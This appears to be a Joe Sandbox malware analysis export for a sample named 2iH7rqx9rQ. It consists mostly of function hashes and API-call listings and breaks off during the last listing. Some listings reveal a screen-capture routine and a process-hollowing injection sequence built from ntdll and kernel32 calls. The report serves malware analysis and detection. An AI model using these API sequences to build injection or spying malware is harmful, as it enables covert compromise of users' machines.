Instruction Fuzzy Hash: A84144B29287058FC315CE29C18161BFBE1FBC8344F148A2EF996A3354D775A980CF86

Function 0044E92E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0044E92E

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615

Function 0044C739 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105

Function 0041E5DF Relevance: .6, Instructions: 606COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 625776db00f8135b3430ac4f96c685e5a82c7243c356f8812e385b573cef2c93
Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
Opcode Fuzzy Hash: 625776db00f8135b3430ac4f96c685e5a82c7243c356f8812e385b573cef2c93
Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A

Function 0248E846 Relevance: .6, Instructions: 606COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
Instruction ID: 3455c1bcf5aaa4fd67e59991a250fc10c0e5ed3abe4b8f3825417101dea9223a
Opcode Fuzzy Hash: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
Instruction Fuzzy Hash: 48329E71B287469BC715EF28C48076FB7E6BB85308F044A2EF9958B381E771D945CB82

Function 004267CB Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f36f3c7a6eaded5573f3324b5464a57deb1f6734da1b85ec4a2b2d3267fe88b9
Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
Opcode Fuzzy Hash: f36f3c7a6eaded5573f3324b5464a57deb1f6734da1b85ec4a2b2d3267fe88b9
Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95

Function 02496A32 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
Instruction ID: e43c475cce7bf3e60d661df869d6f3c9b05c3be01d07e45e03588e02f8bbf997
Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
Instruction Fuzzy Hash: D8029F717046518FD728CF2EE880636B7E1AF8E301746863EE495C7391EB34E922CB94

Function 00426254 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
Opcode Fuzzy Hash: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56

Function 024964BB Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
Instruction ID: 562a7b53b03d200772db493760d73f2cac4ad5c7be82f1d106186796809fd507
Opcode Fuzzy Hash: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
Instruction Fuzzy Hash: 1AF16C716142548FC314DF1DE89087BB3E5EB8A301B460A2EF1C2D7391DB74EA1ACB56

Function 00431377 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
Opcode Fuzzy Hash: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86

Function 0041D071 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c9a89d665279fff66c337cde79944ce2f29e18f5acccf122ed33d2225115b80
Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
Opcode Fuzzy Hash: 7c9a89d665279fff66c337cde79944ce2f29e18f5acccf122ed33d2225115b80
Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24

Function 0248D2D8 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
Instruction ID: b26c96baabe2e4c8d7b6b6cdd09de0b5c226f2a17de34d2c3e59c2c0d387393c
Opcode Fuzzy Hash: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
Instruction Fuzzy Hash: EBB17E7951529A8ACB05EF68C4913F63BA1EF6A300F0850B9EC9CCF756E3358506EB24

Function 00436A8D Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: c2ccfb52f11e3b3b259396a7657262a28929e77abe156aeb413db61674ad6f9a
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: EB91C8722080A319DB2D463E847403FFFE19A563A1B1BA79FD4F2CB2C5EE18D564D624

Function 00436D48 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 4bc7a19b78b3923bd294324807b23a5e70e392b11aa895e474023c0768c286cc
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 1C91B6762080A35ADB2D463AC43403FFFE15A563A1B1B979FD4F2CB2C5EE18C568D624

Function 004367C6 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 8cd81e8b6c8cb135a2d00aee0b4681899237c427d703fcd1ed6b13232f465ad6
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 439195722090A35ADB2D463D843403FFFE15E5A3A1B1B979FD4F2CB2C5EE28C5649624

Function 0043D098 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E

Function 024AD2FF Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
Instruction ID: d662d35bfdec4004f48f05967cf10bfc57e9ef75502f0d24791b7136ffce2d12
Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
Instruction Fuzzy Hash: FA6132A1E00708D6DB389A6988B1BBF2395EF75708F44441FE943DBF90D791E982CB16

Function 024AD0A2 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
Instruction ID: 4aeeb4f31299c2a41ae473b19acd84079aa3641ea319f84f731ccd2600f114cf
Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
Instruction Fuzzy Hash: B5615872F00208D6DA395A6888B1BBF2395DB79748F04041FE943CFF90D711D982CA09

Function 0043651C Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: b40c52ae0115b4061fe2d1036eda9829452ee7622c5651f608d151b30f65a328
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: B081C4722090A319DB2D463E843403FFFE15A563A5B1BA7AFD4F2CB2C5EE18C5649624

Function 0043C9DD Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E

Function 00426FAD Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f22cf2d6689a6b81c37f428f7d360768b41059448ce5cc9f6054267ab15f5fc
Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
Opcode Fuzzy Hash: 5f22cf2d6689a6b81c37f428f7d360768b41059448ce5cc9f6054267ab15f5fc
Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A

Function 02497214 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
Instruction ID: 1932979f29a49a5a52494476fa2b4b91d757356b1f4a2693fbe3be0f78e78f8a
Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
Instruction Fuzzy Hash: A6616A729083019FC708DF75D581A5BBBE9AFD8714F454E2EF4999A150EB70EA088F82

Function 00437150 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908

Function 024A73B7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 9f9b2e2e813fbd6700f4afdfb3b1687670aaf07eb649ba849790961e1eae820d
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 7C113A77B4109243D634CA3DD8B42BFEB85EBE5228B2D877BD0418F758D362E145E600

Function 02470D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 8d0a441c2d4b0705bf0afeee984720ee9befd2432816eb00777e17293a30e26e
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 14012672A126008FDF21CF60C904BEB33F5FB86206F1554B6D92AD7381E370A841CB80

Function 00417F9F Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 324windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
CreateCompatibleDC.GDI32(00000000), ref: 00417FC4

Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482

CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
DeleteDC.GDI32(?), ref: 0041805D
DeleteDC.GDI32(00000000), ref: 00418060
SelectObject.GDI32(00000000,00000000), ref: 0041806B
StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
GetCursorInfo.USER32(?), ref: 004180B5
GetIconInfo.USER32(?,?), ref: 004180CB
DeleteObject.GDI32(?), ref: 004180FA
DeleteObject.GDI32(?), ref: 00418107
DrawIcon.USER32(00000000,?,?,?), ref: 00418114
BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
GetObjectA.GDI32(?,00000018,?), ref: 00418173
LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
DeleteDC.GDI32(?), ref: 0041827F
DeleteDC.GDI32(00000000), ref: 00418282
DeleteObject.GDI32(00000000), ref: 00418285
GlobalFree.KERNEL32(00CC0020), ref: 00418290
DeleteObject.GDI32(00000000), ref: 00418344
GlobalFree.KERNEL32(?), ref: 0041834B
DeleteDC.GDI32(?), ref: 0041835B
DeleteDC.GDI32(00000000), ref: 00418366
DeleteDC.GDI32(?), ref: 00418398
DeleteDC.GDI32(00000000), ref: 0041839B
DeleteObject.GDI32(?), ref: 004183A1

Strings

DISPLAY, xrefs: 00417FB2

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
String ID: DISPLAY
API String ID: 1352755160-865373369
Opcode ID: d7e487d08ee46b1676336597baac99ee3d5545cbc9f86ff4cb64879524805ee7
Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
Opcode Fuzzy Hash: d7e487d08ee46b1676336597baac99ee3d5545cbc9f86ff4cb64879524805ee7
Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A

Function 00417245 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 290libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00475B70,00000000,?,00000000), ref: 0041728C
GetProcAddress.KERNEL32(00000000), ref: 0041728F
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection,?,00000000), ref: 004172A0
GetProcAddress.KERNEL32(00000000), ref: 004172A3
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection,?,00000000), ref: 004172B4
GetProcAddress.KERNEL32(00000000), ref: 004172B7
GetModuleHandleA.KERNEL32(ntdll,ZwClose,?,00000000), ref: 004172C8
GetProcAddress.KERNEL32(00000000), ref: 004172CB
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0041736C
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,?,?,?,00000000), ref: 00417384
GetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 0041739A
ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,?,?,?,00000000), ref: 004173C0
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,00000000), ref: 00417440
TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 00417454
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040,?,?,?,?,?,00000000), ref: 0041748B
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
SetThreadContext.KERNEL32(?,00000000), ref: 00417575
ResumeThread.KERNEL32(?), ref: 00417582
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,00000000), ref: 0041759A
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00000000), ref: 004175A5
TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 004175BF
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 004175C7

Strings

ZwClose, xrefs: 004172B9
ZwUnmapViewOfSection, xrefs: 004172A5
ntdll, xrefs: 00417277, 00417296, 004172AA, 004172BE
ZwCreateSection, xrefs: 00417272
ZwMapViewOfSection, xrefs: 00417291

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 4188446516-3035715614
Opcode ID: 5d40828951e42fdedea5ee9115d9cd0f69bf919f6a62d0ccd39d0c721eb4fea7
Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
Opcode Fuzzy Hash: 5d40828951e42fdedea5ee9115d9cd0f69bf919f6a62d0ccd39d0c721eb4fea7
Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A

Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
ExitProcess.KERNEL32 ref: 0041151D

Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D

